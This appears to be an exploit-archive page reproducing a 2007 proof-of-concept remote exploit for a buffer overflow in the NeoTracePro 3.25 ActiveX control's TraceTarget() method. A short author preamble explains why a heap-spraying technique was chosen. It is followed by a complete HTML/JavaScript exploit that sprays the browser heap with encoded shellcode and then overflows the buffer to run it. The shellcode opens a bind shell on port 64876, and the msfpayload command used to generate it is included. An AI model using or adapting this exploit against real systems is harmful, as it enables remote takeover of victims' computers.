Home / os / winme

neotracepro-overflow.txt

Posted on 10 July 2007

<!-- /* PUBLIC SINCE MAY 31th 2007 */ /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/ ____________________________________________________________________________ NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit Risk Level: High Impact: Remote command execution Author: A. Alejandro Hernández aka nitr0us <nitrousenador@gmail.com> Date: 24/03/07 México ____________________________________________________________________________ /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/ I found this buffer overflow fuzzing NeoTraceExplorer.dll (an ActiveX Control) with ComRaider from iDefense. It has a method called TraceTarget() which can be exploited passing a large string (~486 bytes) due there's no boundary checking. Unfortunately, somebody else found this vulnerability few months ago, but this person didn't release an exploit ;) just published an advisory ( http://secunia.com/advisories/23463). First of all, this b0f cannot be exploitable with the classic technique (EIP points to an address that has a 'jmp esp') because each byte of the ret address MUST BE between 0x00 and 0x7f (ascii values), in other case, InternetExplorer will change the out-of-range bytes to 0x3f ('?' character) and EIP will point to and invalid address. Example: I've an 'jmp esp' @ 0x7c951eed in ntdll.dll, if I set the ret address to 0x7c951eed, when the buffer gets passed from Internet Explorer to TraceTarget(), it will overwrite EIP with: 0x7c3f1e3f (bullshit!). So, The Skylined's Heap Spraying technique comes into my mind... and here is, working so fuckin' fine =). TESTED ON: Windows XP SP 2 (Spanish) + Internet Explorer 7.0.5730.11 + NeoTracePro 3.25 Greetz to: Crypkey, alt3kx, zonartm.org, dex, Optix, Nahual, ran. --> <html> <head> <title> NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit </title> </head> <body bgcolor=black text=white link=white alink=white vlink=white> <center> <object classid="clsid:3E1DD897-F300-486C-BEAF-711183773554" id="NeoTracePro"></object> <b>/**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE ****/</b><br><br> NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit<br> by <a href="mailto:nitrousenador@gmail.com">nitr0us</a><br> <a href="http://www.genexx.org/nitrous/" target=_blank>www.genexx.org/nitrous/</a><br><br> <input type="button" value="Exploit!" onClick="exploit()"> <script> function exploit(){ var Target = ""; // Exploit string var PwnEIP = 486; // bytes to reach EIP var Ninja = "x05x05x05x05"; // ret address = 0x05050505 /* The fscking shellc0de, bind port 64876 [nitro ;)], encoded with Skylined's Alpha2 encoder and finally converted to utf-16 */ // $./msfpayload win32_bind LPORT=64876 R | ./msfencode -t raw -b 'x00' -e Alpha2 | ./beta --utf-16 > shellcode.txt // beta encoder src: http://www.edup.tudelft.nl/~bjwever/src/beta.c var ShellCode = unescape( "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4937%u4949%u4949%u4949%u4949%u4949%u4949%u4949" + "%u5a51%u626a%u3058%u3042%u4150%u416b%u7241%u4132%u4142%u3242%u4142%u4230%u5841%u4138" + "%u5042%u7a75%u6b49%u434c%u585a%u726b%u4d6d%u5938%u4969%u496f%u696f%u516f%u4c70%u324b" + "%u444c%u4164%u4e34%u476b%u4735%u4e4c%u636b%u744c%u3245%u5358%u5a31%u4c4f%u724b%u756f" + "%u6e48%u536b%u576f%u3650%u4861%u636b%u4e79%u706b%u6c34%u644b%u6a41%u544e%u4f71%u4f30" + "%u6e69%u6b4c%u4f34%u5130%u4464%u5a47%u3961%u545a%u444d%u6f41%u4a32%u494b%u6564%u426b" + "%u6474%u7164%u6138%u5a65%u6e45%u636b%u656f%u6574%u7851%u556b%u6c36%u664b%u506c%u4c4b" + "%u514b%u474f%u456c%u7851%u776b%u5473%u6e6c%u4e6b%u7269%u614c%u5734%u426c%u4f41%u4633" + "%u4b51%u316b%u4c74%u714b%u5053%u4c30%u614b%u6650%u6c6c%u344b%u3730%u4c6c%u4c6d%u474b" + "%u6730%u4178%u734e%u6e58%u326e%u766e%u5a6e%u764c%u4b30%u484f%u4256%u7246%u7573%u4336" + "%u3458%u7473%u4272%u5448%u3237%u3453%u7372%u426f%u6b74%u7a4f%u7070%u5868%u584b%u4b6d" + "%u774c%u304b%u4b50%u5a4f%u5376%u6d6f%u4b59%u6355%u4f56%u6a71%u534d%u3438%u6642%u7235" + "%u444a%u3942%u386f%u5050%u6e68%u6439%u4b49%u6e45%u304d%u4b57%u494f%u5346%u3063%u6353" + "%u3663%u5333%u3163%u5153%u3043%u3343%u4b63%u4a4f%u5070%u7166%u4978%u526d%u434c%u5656" + "%u4c33%u4d49%u6e31%u5075%u4c68%u3464%u505a%u6f70%u4637%u3937%u4e6f%u7036%u746a%u4350" + "%u7661%u7935%u586f%u6150%u6d78%u4e74%u764d%u6d4e%u5239%u7977%u4e6f%u3336%u3363%u4965" + "%u4a6f%u5370%u4958%u3775%u4e39%u7066%u4649%u4b37%u4e4f%u6636%u7630%u6634%u6634%u6935" + "%u486f%u7a50%u4233%u3948%u7077%u7879%u3146%u5069%u3957%u6b6f%u5366%u6965%u686f%u6550" + "%u7336%u655a%u7034%u3166%u5178%u7273%u6f4d%u6d79%u3135%u427a%u6670%u4139%u5839%u6e4c" + "%u4869%u7367%u735a%u6e74%u6a69%u3742%u3941%u3850%u6c73%u4b6a%u774e%u4432%u4b6d%u474e" + "%u6432%u6d6c%u6e43%u706d%u307a%u6c38%u6c6b%u4e6b%u634b%u7058%u4b72%u4e4e%u5653%u4b76" + "%u424f%u3055%u5944%u796f%u6346%u706b%u7257%u7272%u4671%u5031%u3251%u644a%u7041%u3251" + "%u4171%u4645%u3931%u6a6f%u6370%u4c58%u6e6d%u5739%u5875%u434e%u4963%u6b6f%u5166%u4b7a" + "%u6b4f%u754f%u6967%u686f%u4e50%u366b%u3937%u4c6c%u3843%u5044%u4964%u5a6f%u4676%u4932" + "%u7a6f%u7570%u6c38%u6e30%u456a%u7154%u464f%u6b33%u4e4f%u6b36%u6e4f%u6230"); var heapSprayToAddress = 0x05050505; // Spray up to this address var heapBlockSize = 0x400000; // Size of the blocks we want to create var heapHdrSize = 0x38; // The size of the header of heap blocks in MSIE var payLoadSize = ShellCode.length * 2; // Size of the shellcode (convert dwords to bytes) var spraySlideSize = heapBlockSize - (payLoadSize + heapHdrSize); // Size of the nopslide var spraySlide = unescape("%u4141%u4141"); // NOP Slide filled with 0x41 ( inc ecx) var heapBlocks = (heapSprayToAddress - 0x400000) / heapBlockSize; // Number of heap blocks spraySlide = getSpraySlide(spraySlide, spraySlideSize); // We are going to create large blocks that will contain: // [heap header][nopslide...........................][shellcode] memory = new Array(); for (k = 0; k < heapBlocks; k++) memory[k] = spraySlide + ShellCode; // Create the Target string while(Target.length < PwnEIP) Target += "A"; Target += Ninja; // Exploit ! NeoTracePro.TraceTarget(Target); } function getSpraySlide(spraySlide, spraySlideSize){ // The quickest way to create large blocks of memory is doubling their size untill they are // big enough (or too big, in which case we cut them back to size.) while(spraySlide.length * 2 < spraySlideSize) spraySlide += spraySlide; spraySlide = spraySlide.substring(0, spraySlideSize / 2); return spraySlide; } </script> </center> </body> </html>

 

TOP